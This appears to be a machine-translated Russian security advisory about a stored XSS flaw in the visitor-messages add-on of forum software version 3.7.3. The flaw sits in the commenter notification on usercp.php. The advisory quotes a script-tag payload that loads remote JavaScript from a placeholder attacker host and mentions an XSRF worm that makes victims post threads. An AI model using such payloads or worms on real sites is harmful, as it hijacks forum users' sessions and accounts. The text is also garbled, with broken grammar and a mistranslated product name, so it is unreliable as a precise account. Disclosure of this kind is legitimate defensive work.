- Описание = критическая уязвимость существует в новых Справка 3.7.3 программное обеспечение, которое поставляется включен
с посетителем сообщений аддон (клон социальной сети стены / комментарий область).
При публикации XSS, данные проходят через htmlentities (); затем отображается
для широкой публики / участники форума. Однако, при отправке нового сообщения
новое уведомление направляется commentee. Комментатор должности XSS вектор таких, как
<script src="http://evilsite.com/nbd.js">, и когда commentee посещений usercp.php
в рамках домена, они били нефильтрованное XSS приложу. XSRF также легко доступны
и я включил пример червя, что позволяет пользователю создать новое нить с вашими собственными
указанной темы и сообщения.